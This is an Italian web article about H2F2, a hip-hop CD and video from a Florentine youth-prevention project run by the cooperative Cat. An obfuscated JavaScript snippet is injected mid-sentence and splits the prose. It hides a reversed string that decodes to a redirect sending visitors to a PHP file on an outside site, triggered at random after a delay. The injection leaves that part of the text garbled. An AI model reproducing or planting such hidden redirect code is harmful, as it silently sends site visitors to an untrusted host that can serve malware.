Tracce hip hop

image_pdfimage_print

Una compilation e un video per viaggiare nel mondo hip-hop di casa nostra. Si chiama H2F2 ed è la seconda pubblicazione del Progetto Teen Music. Il progetto, a cura della cooperativa sociale Cat, lavora sulla prevenzione del disagio giovanile tramite la diffusione dell’hip-hop, che da voce del dissenso diventa strumento di aggregazione e prevenzione, qu (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando non una vera e propria alternativa alla strada. A questo passaggio hanno contribuito gli operatori della cooperativa Cat, che sono andati a scavare tra i dj, i ballerini di break dance, i graffitisti, i rapper, i giovani immigrati e li hanno fatti conoscere, ognuno con le proprie ingiustizie da raccontare.
Ne sono venuti fuori due cd, uno audio e l’altro video, in cui i ragazzi coinvolti nel progetto cantano la realtà in cui vivono, dal costo di un affitto, all’esclusione sociale, all’immobilità culturale di Firenze. Il video ripercorre la storia della cultura hip-hop fiorentina, dai concerti dell’Auditorium Flog, alla scuola di ballo al campo rom dell’Olmatello, ai graffiti sui muri nudi di cemento delle nostre periferie.
Per informazioni e per richiedere i cd: www.hdf.it; email h2f@libero.it;
Leonardo Landi 340-3345980
Gaspare Bucca 335-5451435

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *